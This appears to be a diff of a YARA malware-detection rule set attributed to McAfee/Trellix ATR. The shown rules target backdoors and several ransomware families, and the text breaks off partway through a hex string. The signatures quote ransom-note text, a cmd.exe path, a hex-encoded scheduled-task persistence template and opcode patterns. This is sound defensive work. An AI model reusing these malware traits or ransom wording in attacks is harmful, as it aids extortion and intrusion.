+		$s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $variant* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect kankan PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9"
-		date = "2013-08-01"
+		description = "Ransomware encrypting Mongo Databases "
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "4350a874-dd76-5379-af9f-f1d190385706"
+		date = "2019-04-25"
 		modified = "2020-08-14"
-		reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_kankan_pdb.yar#L1-L27"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MONGOLOCK.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a"
-		logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760"
+		logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Kankan"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/MongLock"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8"
 
 	strings:
-		$pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb"
-		$pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb"
-		$pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb"
+		$x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide
+		$s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii
+		$s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii
+		$s3 = "No valid port number in connect to host string (%s)" fullword ascii
+		$s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii
+		$s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii
+		$s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii
+		$s7 = "detail may be available in the Windows System event log." fullword ascii
+		$s8 = "Found bundle for host %s: %p [%s]" fullword ascii
+		$s9 = "No valid port number in proxy string (%s)" fullword ascii
+		$op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 }
+		$op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 }
+		$op2 = { c7 41 0c df ff ff ff c7 41 10 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Jatboss : PHISHING FILE
+
+rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents"
+		description = "Rule to detect MegaCortex samples digitally signed"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85"
-		date = "2019-12-04"
+		id = "78a74e30-4de0-5e63-8ca5-31251c296f98"
+		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_jatboss.yar#L1-L36"
+		reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MegaCortex.yar#L3-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb"
-		logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc"
+		logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249"
 		score = 75
-		quality = 66
-		tags = "PHISHING, FILE"
-		rule_version = "v1"
-		malware_type = "phishing"
-		malware_family = "Phishing:W32/Jatboss"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/MegaCortex"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
-	strings:
-		$jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
-		$jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
-		$spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 }
-
 	condition:
-		( uint16( 0 ) == 0x5025 and filesize < 1000KB and ( $jat or $jatboss ) ) or ( uint16( 0 ) == 0xcfd0 and $spam and any of ( $jat* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures [ i ] . serial == "00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e" )
 }
-rule TRELLIX_ARC_Shifu : FINANCIAL
+rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "No description has been set in the source file - Trellix ARC"
-		author = "McAfee Labs"
-		id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387"
-		date = "2025-06-01"
+		description = "Rule to detect Loocipher ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "d18efe09-4b04-5089-84f8-aead63fc19bb"
+		date = "2019-12-05"
 		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Shifu.yar#L1-L24"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Loocipher.yar#L1-L46"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63"
+		hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0"
+		logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba"
 		score = 75
 		quality = 70
-		tags = "FINANCIAL"
-		malware_type = "financial"
-		malware_family = "Backdoor:W32/Shifu"
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Loocipher"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$b = "RegCreateKeyA"
-		$a = "CryptCreateHash"
-		$c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
-		$d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
-		$e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
+		$x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii
+		$x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii
+		$s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii
+		$s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii
+		$s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii
+		$s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide
+		$s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide
+		$s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide
+		$s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide
+		$s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide
+		$s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide
+		$s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide
+		$s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide
+		$s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide
+		$s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide
+		$s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide
+		$s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii
+		$s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide
+		$s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide
+		$s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER
+rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template"
-		author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team"
-		id = "7a1addcf-4e8f-5290-8788-9b0738128160"
-		date = "2021-04-08"
-		modified = "2021-08-04"
-		reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MAL_cyax_sharp_loader.yar#L1-L16"
+		description = "Rule to detect Jeff Dev Ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401"
+		date = "2018-08-26"
+		modified = "2020-08-14"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_jeff_dev.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2"
+		hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a"
+		logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032"
 		score = 75
-		quality = 70
-		tags = "LOADER"
-		version = "1.0"
-		malware_type = "loader"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Jeff"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E }
+		$s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide
+		$s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii
+		$s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide
+		$s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide
 
 	condition:
-		$template
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB ) and all of them
 }
-rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE
+rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect cutwail based on the PDB"
+		description = "Rule to detect the Corona Virus Installer"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba"
-		date = "2008-04-16"
+		id = "2a224529-bfc7-57ed-91c3-426cae4b7895"
+		date = "2020-03-25"
 		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cutwail.yar#L1-L25"
+		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010"
-		logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927"
+		hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed"
+		logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629"
 		score = 75
-		quality = 70
-		tags = "BOTNET, FILE"
+		quality = 62
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Cutwail"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CoronaVirus"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb"
+		$s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D }
+		$s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D }
+		$s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D }
+		$s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 }
+		$s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 }
+		$s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 440KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-
-rule TRELLIX_ARC_Trojan_Coinminer : FILE
+rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Coinminer malware"
-		author = "Trellix ATR"
-		id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298"
-		date = "2021-07-22"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/Trojan_CoinMiner.yar#L3-L23"
+		description = "Rule to detect the Corona Virus ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "4195a57b-cd51-5050-861a-6436f7ec4eca"
+		date = "2020-03-25"
+		modified = "2020-08-14"
+		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L43-L80"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd"
+		hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3"
+		logic_hash = "2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		version = "v1"
-		hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2"
-		hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7"
+		quality = 64
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CoronaVirus"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c }
-		$seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e }
-		$seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 }
-		$seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f }
-		$seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a }
-		$seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 }
+		$s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 